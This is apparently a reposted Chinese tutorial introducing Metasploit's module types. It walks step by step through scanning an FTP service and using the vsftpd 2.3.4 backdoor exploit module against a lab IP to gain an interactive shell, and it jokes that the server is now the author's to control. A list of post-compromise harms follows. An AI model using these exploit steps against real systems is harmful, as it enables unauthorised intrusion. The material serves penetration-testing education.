渗透武器库---Metasploit渗透测试框架实战

2023-11-02 11:59

本文主要是介绍渗透武器库---Metasploit渗透测试框架实战,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

点击"仙网攻城狮”关注我们哦~

不当想研发的渗透人不是好运维

让我们每天进步一点点

简介

Metasploit渗透测试框架在kali系统中可以直接使用,不需要去搭建繁杂的各种环境。

          kali系统安装方法查看:

渗透利器--最新版kali2020系统安装(超详细)

Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具

实战

运行Metasploit

1.废话不多说,运行kali,打开命令行输入msfconsole进入Metasploit渗透框架中。

2.输入show +模块名查看各个模块

辅助模块(auxiliary)
扫描、发掘漏洞、探测信息等工作渗透攻击模块(exploits)
利用已发现的漏洞对远程目标系统进行攻击,植入并运行攻击载荷,从而控制目标系统攻击载荷模块(payloads)
在渗透攻击触发漏洞后劫持程序执行流程并跳入的这段代码。本模块的作用是消除安全工作人员开发这部分代码的代价空指令模块(nops)
为了避免攻击载荷在执行的过程中出现随机地址和返回地址错误而在执行shellcode之前加入一些空指令,使得在执行shellcode时有一个较大的安全着陆区。编码器模块(encoders)
将攻击载荷进行编码(类似与加密),让避免操作系统和杀毒软件辨认出来但是会让载荷的体积变大,这个时候需要选择传输器和传输体配对成的攻击载荷来下载目标载荷并且运行。后渗透攻击模块(post)
先拿下一个无关紧要的目标(A)来攻击真正的目标(B),A来执行真正的渗透攻击。


3.例如我想看ftp是什么版本,使用use auxiliary/scanner/ftp/ftp_version切换辅助模块进行扫描来查看ftp服务版本。

set rhosts 192.168.88.45

--配置目标ip地址也可以配置域名

set rport 21

--配置目标端口

run

--运行扫描

图中可以看到ftp服务版本vsFTPd 2.3.4

4.使用search vsFTPd 2.3.4来进行搜索当前版本是否有相关漏洞,图中可以看到匹配到了一个相关漏洞并列出了一个exp(漏洞利用模块)

5.切换到exp漏洞利用模块进行攻击,

use exploit/unix/ftp/vsftpd_234_backdoor  

--切换到攻击模块

set rhosts 192.168.88.45

--配置目标

run

--运行攻击入侵目标

上图可以看到已经建立了交互式shell可以执行任意命令,攻击成功后你的服务器就相当于归我了嘿嘿!--想干啥干啥。

6.攻击成功后可以做什么?

在几年前大家安全意识薄弱的时候并没有太在意网络安全,给大家普及一下安全知识,你的电脑被入侵后骇客可以做什么。

A.植入木马程序,你在网上转账时记录你的用户名密码,进行网络盗窃


B.植入挖矿程序,耗完你电脑CPU和GPU进行挖矿,造成电脑卡顿无法上网等。

C.植入病毒程序,造成电脑蓝屏、无法使用等。

D.植入勒索软件,加密你的工作资料并向你索要赎金。

往期内容

Android渗透工具drozer安装与使用

渗透利器--最新版kali2020系统安装(超详细)

带你进入CTF的世界(比较枯燥又必须要了解/(ㄒoㄒ)/)

100 个网络基础知识,看完成半个网络高手!

更多资讯长按二维码 关注我们

   专业的信息安全团队,给你最安全的保障。定期推送黑客知识和网络安全知识文章,让各位了解黑客的世界,学习黑客知识,普及安全知识,提高安全意识。

觉得不错点个“赞”呗

这篇关于渗透武器库---Metasploit渗透测试框架实战的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/330449

相关文章

Spring Boot + MyBatis Plus 高效开发实战从入门到进阶优化(推荐)

《SpringBoot+MyBatisPlus高效开发实战从入门到进阶优化(推荐)》本文将详细介绍SpringBoot+MyBatisPlus的完整开发流程,并深入剖析分页查询、批量操作、动... 目录Spring Boot + MyBATis Plus 高效开发实战:从入门到进阶优化1. MyBatis

MyBatis 动态 SQL 优化之标签的实战与技巧(常见用法)

《MyBatis动态SQL优化之标签的实战与技巧(常见用法)》本文通过详细的示例和实际应用场景,介绍了如何有效利用这些标签来优化MyBatis配置,提升开发效率,确保SQL的高效执行和安全性,感... 目录动态SQL详解一、动态SQL的核心概念1.1 什么是动态SQL?1.2 动态SQL的优点1.3 动态S

Pandas使用SQLite3实战

《Pandas使用SQLite3实战》本文主要介绍了Pandas使用SQLite3实战,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学... 目录1 环境准备2 从 SQLite3VlfrWQzgt 读取数据到 DataFrame基础用法:读

Python Dash框架在数据可视化仪表板中的应用与实践记录

《PythonDash框架在数据可视化仪表板中的应用与实践记录》Python的PlotlyDash库提供了一种简便且强大的方式来构建和展示互动式数据仪表板,本篇文章将深入探讨如何使用Dash设计一... 目录python Dash框架在数据可视化仪表板中的应用与实践1. 什么是Plotly Dash?1.1

基于Flask框架添加多个AI模型的API并进行交互

《基于Flask框架添加多个AI模型的API并进行交互》:本文主要介绍如何基于Flask框架开发AI模型API管理系统,允许用户添加、删除不同AI模型的API密钥,感兴趣的可以了解下... 目录1. 概述2. 后端代码说明2.1 依赖库导入2.2 应用初始化2.3 API 存储字典2.4 路由函数2.5 应

Python GUI框架中的PyQt详解

《PythonGUI框架中的PyQt详解》PyQt是Python语言中最强大且广泛应用的GUI框架之一,基于Qt库的Python绑定实现,本文将深入解析PyQt的核心模块,并通过代码示例展示其应用场... 目录一、PyQt核心模块概览二、核心模块详解与示例1. QtCore - 核心基础模块2. QtWid

Python实战之屏幕录制功能的实现

《Python实战之屏幕录制功能的实现》屏幕录制,即屏幕捕获,是指将计算机屏幕上的活动记录下来,生成视频文件,本文主要为大家介绍了如何使用Python实现这一功能,希望对大家有所帮助... 目录屏幕录制原理图像捕获音频捕获编码压缩输出保存完整的屏幕录制工具高级功能实时预览增加水印多平台支持屏幕录制原理屏幕

最新Spring Security实战教程之Spring Security安全框架指南

《最新SpringSecurity实战教程之SpringSecurity安全框架指南》SpringSecurity是Spring生态系统中的核心组件,提供认证、授权和防护机制,以保护应用免受各种安... 目录前言什么是Spring Security?同类框架对比Spring Security典型应用场景传统

最新Spring Security实战教程之表单登录定制到处理逻辑的深度改造(最新推荐)

《最新SpringSecurity实战教程之表单登录定制到处理逻辑的深度改造(最新推荐)》本章节介绍了如何通过SpringSecurity实现从配置自定义登录页面、表单登录处理逻辑的配置,并简单模拟... 目录前言改造准备开始登录页改造自定义用户名密码登陆成功失败跳转问题自定义登出前后端分离适配方案结语前言

OpenManus本地部署实战亲测有效完全免费(最新推荐)

《OpenManus本地部署实战亲测有效完全免费(最新推荐)》文章介绍了如何在本地部署OpenManus大语言模型,包括环境搭建、LLM编程接口配置和测试步骤,本文给大家讲解的非常详细,感兴趣的朋友一... 目录1.概况2.环境搭建2.1安装miniconda或者anaconda2.2 LLM编程接口配置2